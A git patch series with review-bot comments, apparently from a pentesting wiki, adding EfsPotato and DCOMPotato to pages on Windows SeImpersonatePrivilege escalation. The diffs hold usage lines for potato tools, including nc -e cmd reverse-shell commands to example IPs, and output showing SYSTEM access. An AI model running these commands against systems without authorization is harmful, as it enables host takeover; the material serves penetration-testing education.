From 82743ad320e1c86d6e7d522a634e5c01056cc04c Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Wed, 17 Jul 2024 07:08:16 +1000 Subject: [PATCH 1/5] Add EfsPotato --- .../privilege-escalation-abusing-tokens/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md index 3915be73f..2ff5e485b 100644 --- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md +++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md 
@@ -24,7 +24,7 @@ If you **don't know what are Windows Access Tokens** read this page before conti ### SeImpersonatePrivilege -This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). +This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato) and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). {% content-ref url="../roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../roguepotato-and-printspoofer.md) From b44fe27cf06300f8fc7911558616b64d548f156a Mon Sep 17 00:00:00 2001 
From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Wed, 17 Jul 2024 07:11:31 +1000 Subject: [PATCH 2/5] roguepotato-and-printspoofer.md: Add EfsPotato --- .../roguepotato-and-printspoofer.md | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index 4f87e88b0..3192f3c62 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md 
@@ -29,7 +29,7 @@ You can check their website and try their engine for **free** at: *** {% hint style="warning" %} -**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. +**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,**[**EfsPotato**](https://github.com/zcgonvh/EfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. {% endhint %} ## Quick Demo 
@@ -82,6 +82,25 @@ C:\temp>type C:\temp\w.log nt authority\system ``` +### EfsPotato + +``` +EfsPotato.exe "whoami" +Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). +Part of GMH's fuck Tools, Code By zcgonvh. +CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] + +[+] Current user: NT Service\MSSQLSERVER +[+] Pipe: \pipe\lsarpc +[!] binding ok (handle=aeee30) +[+] Get Token: 888 +[!] process with pid: 3696 created. +============================== +[x] EfsRpcEncryptFileSrv failed: 1818 + +nt authority\system +``` + ### GodPotato ``` @@ -96,6 +115,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" * [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) +* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) ### [WhiteIntel](https://whiteintel.io) From 566d9ff5c2d1301c45fbdbea6b11d30b9bdd162f Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Wed, 17 Jul 2024 07:14:19 +1000 Subject: [PATCH 3/5] roguepotato-and-printspoofer.md: Add bash syntax highlighting and '>' command input indicators --- .../roguepotato-and-printspoofer.md | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index 3192f3c62..622c675b4 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md 
@@ -63,8 +63,8 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f ### SharpEfsPotato -``` -SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" +```bash +> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. @@ -84,8 +84,8 @@ nt authority\system ### EfsPotato -``` -EfsPotato.exe "whoami" +```bash +> EfsPotato.exe "whoami" Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). Part of GMH's fuck Tools, Code By zcgonvh. CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] @@ -103,9 +103,10 @@ nt authority\system ### GodPotato -``` -GodPotato -cmd "cmd /c whoami" -GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" +```bash +> GodPotato -cmd "cmd /c whoami" +# You can achieve a reverse shell like this. +> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` ## References From 92c03ab815620160bde86a1794a3be01833e07d9 Mon Sep 17 00:00:00 2001 From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Thu, 25 Jul 2024 00:58:13 +1000 Subject: [PATCH 4/5] Update README.md --- .../privilege-escalation-abusing-tokens/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md index 2ff5e485b..c237c4a01 100644 --- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md 
+++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md @@ -24,7 +24,7 @@ If you **don't know what are Windows Access Tokens** read this page before conti ### SeImpersonatePrivilege -This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato) and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). +This is privilege that is held by any process allows the impersonation (but not creation) of any token, given that a handle to it can be obtained. A privileged token can be acquired from a Windows service (DCOM) by inducing it to perform NTLM authentication against an exploit, subsequently enabling the execution of a process with SYSTEM privileges. This vulnerability can be exploited using various tools, such as [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (which requires winrm to be disabled), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato), [DCOMPotato](https://github.com/zcgonvh/DCOMPotato) and [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). {% content-ref url="../roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../roguepotato-and-printspoofer.md) From 5537189f6328de03dfc0c1681bd5f8427ffca0c9 Mon Sep 17 00:00:00 2001 
From: sealldev <120470330+sealldeveloper@users.noreply.github.com> Date: Thu, 25 Jul 2024 01:01:23 +1000 Subject: [PATCH 5/5] roguepotato-and-printspoofer.md: Addition of DCOMPotato --- .../roguepotato-and-printspoofer.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index 622c675b4..6edf97c40 100644 --- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md 
@@ -29,7 +29,7 @@ You can check their website and try their engine for **free** at: *** {% hint style="warning" %} -**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,**[**EfsPotato**](https://github.com/zcgonvh/EfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. +**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. {% endhint %} ## Quick Demo 
@@ -109,6 +109,11 @@ nt authority\system > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` +### DCOMPotato + +![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) + + ## References * [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) @@ -117,6 +122,7 @@ nt authority\system * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) * [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) +* [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) ### [WhiteIntel](https://whiteintel.io)
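Review bot: (PATCH 1/5, README.md, `### SeImpersonatePrivilege` hunk) The opening of the edited line is ungrammatical and survives the change unchanged: "This is privilege that is held by any process allows the impersonation (but not creation) of any token". Since the hunk already rewrites this whole line to append EfsPotato, fix the sentence at the same time, e.g. "This privilege, when held by a process, allows the impersonation (but not creation) of any token, given that a handle to it can be obtained."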
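Review bot: (PATCH 2/5, roguepotato-and-printspoofer.md, `@@ -29,7 +29,7 @@` hunt hint hunk) The added item is glued to the previous one: `[**GodPotato**](https://github.com/BeichenDream/GodPotato)**,**[**EfsPotato**]` has no space after `**,**`, so the rendered list reads "GodPotato,EfsPotato" while every other item is separated by `**,** `. PATCH 5/5 of this same series corrects the spacing; squash that fix into this commit so the intermediate state never lands.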
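Review bot: (PATCH 2/5, `@@ -82,6 +82,25 @@` hunk, new `### EfsPotato` section) The captured run prints `[x] EfsRpcEncryptFileSrv failed: 1818` immediately before the `nt authority\system` result, and the section has no sentence explaining that the final line is the output of the `whoami` argument and that the run still succeeded; a reader skimming for "failed" will assume the tool did not work. Add one sentence above the block saying which line is the result, and consider trimming the banner lines (`Part of GMH's fuck Tools, Code By zcgonvh.` and the CVE credit line) that carry no usage information. The block is also the only one at this point without a language tag or prompt, which PATCH 3/5 then revisits.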
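Review bot: (PATCH 3/5, `@@ -63,8 +63,8 @@` hunk, SharpEfsPotato block) Tagging this block `bash` and prefixing the command with a bare `>` misdescribes it: it is a Windows command-prompt transcript mixing one command with its output, and the existing demo a few lines below in the same file already uses the `C:\temp>` prompt form (`C:\temp>type C:\temp\w.log`). Use that prompt convention (or a neutral tag) so the three sections agree and so bash highlighting does not treat the backslashes in `C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe` as escapes.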
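Review bot: (PATCH 3/5, `@@ -84,8 +84,8 @@` hunk, EfsPotato block) This hunk rewrites the fence and command line that PATCH 2/5 of the same series introduced; squash it into 2/5 so history does not carry a version of the section that the next commit immediately replaces. The same `bash` tag and `>` prompt concern raised for the SharpEfsPotato block applies here.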
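Review bot: (PATCH 3/5, `@@ -103,9 +103,10 @@` hunk, GodPotato block) The added line `# You can achieve a reverse shell like this.` sits inside a block presented as a command-prompt session; `#` is not a comment marker in cmd.exe, so the line is neither valid input nor distinguishable from output once the other lines carry `>` prompts. Move the sentence into prose above the block (matching how the rest of the page introduces its examples) or, if it must stay inside, use `REM`.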
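Review bot: (PATCH 4/5, README.md `### SeImpersonatePrivilege` hunk) This hunk edits the same line as PATCH 1/5; squash the two. More substantively, the sentence still describes the mechanism only as a "Windows service (DCOM)" induced "to perform NTLM authentication against an exploit", which no longer matches every tool now listed: the EfsPotato banner shown in PATCH 2/5 identifies its vector as "MS-EFSR EfsRpcEncryptFileSrv", not DCOM/NTLM. Either generalize the clause to cover the service-side RPC variants or add a short note that the listed tools differ in which privileged service they coerce, so the description and the list agree.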
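Review bot: (PATCH 5/5, `@@ -29,7 +29,7 @@` hint hunk) A stray `**` after `[**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)` unbalances the bold markers: it opens a bold span that the later `**leverage` closes, so " can be used to " renders bold and "leverage the same privileges and gain `NT AUTHORITY\SYSTEM`" renders plain. Remove the stray `**` (and add "and" before the last list item).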
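Review bot: (PATCH 5/5, `@@ -109,6 +109,11 @@` hunk, new `### DCOMPotato` section) The section consists only of a screenshot (`https://github.com/user-attachments/assets/...`), while every sibling section (SharpEfsPotato, EfsPotato, GodPotato) gives the invocation and output as text. A screenshot is not searchable, copyable, or readable by screen readers, and a user-attachments asset uploaded through the PR UI lives outside the repository, so the page breaks if it disappears. Replace the image with a fenced usage example in the same style as the neighbouring sections, and drop the second blank line before `## References` (the file uses a single blank line between sections).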